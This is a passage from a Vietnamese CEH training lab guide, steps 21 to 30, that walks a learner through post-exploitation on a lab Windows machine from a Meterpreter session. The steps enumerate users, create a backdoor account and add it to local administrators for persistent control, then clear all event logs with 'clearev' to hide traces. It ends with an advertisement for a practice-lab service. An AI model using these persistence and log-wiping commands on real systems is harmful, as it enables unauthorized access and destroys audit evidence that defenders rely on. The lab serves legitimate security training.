Nhấn Enter .

Bước 21
Lưu ý rằng dấu nhắc lệnh Windows được hiển thị.

Bước 22
Bây giờ bạn có thể sử dụng tất cả các lệnh của dấu nhắc lệnh Windows. Nhập lệnh sau:
net users
Nhấn Enter .

Bước 23
Kết quả của lệnh người dùng mạng được hiển thị.

Bước 24
Bạn đã thấy những người dùng hiện có trên hệ thống PLABWIN10 . Bạn luôn có thể kiểm soát liên tục hệ thống bằng cách tạo người dùng có đặc quyền quản trị. Đầu tiên, hãy tạo một người dùng mới trên hệ thống PLABWIN10 . Nhập lệnh sau:Lưu ý: Bạn có thể xác định bất kỳ mật khẩu nào, nhưng nó phải phức tạp. Nếu nó không đủ phức tạp, Windows sẽ tạo ra lỗi.
net user /add plabuser Test**1234
Nhấn Enter .

Bước 25
Lưu ý rằng plabuser hiện đã được tạo trên hệ thống PLABWIN10 .

Bước 26
Bây giờ hãy thêm plabuser vào nhóm Quản trị viên cục bộ . Để thực hiện việc này, hãy nhập lệnh sau:
net localgroup administrators plabuser /add
Nhấn Enter .

Bước 27
Các plabuser tại được thêm vào địa phương quản trị nhóm.

Bước 28
Bạn có thể thoát khỏi dấu nhắc lệnh của Windows. Gõ lệnh sau
exit
Nhấn Enter . Bạn đang trở lại trên Meterpreter command prompt.

Bước 29
Để đảm bảo rằng bạn không bị theo dõi, bạn có thể xóa bất kỳ loại dấu vết nào mà trọng tải phải để lại. Để thực hiện việc này, bạn cần xóa tất cả nhật ký trên hệ thống Windows. Nhập lệnh sau:
clearev
Nhấn Enter .

Bước 30
Lưu ý rằng các tệp nhật ký hiện đã bị xóa.

Hoàn thành , hãy thực hành thêm CBT CEH v11 Lab Guide để re-inforce kiến thức, trau dồi kỹ năng.
Để đăng kí lab thực hành online Security365 Practice Labs vui lòng liên hệ admin Đại Ngọc Sơn
Zalo : Security365 – 0911486676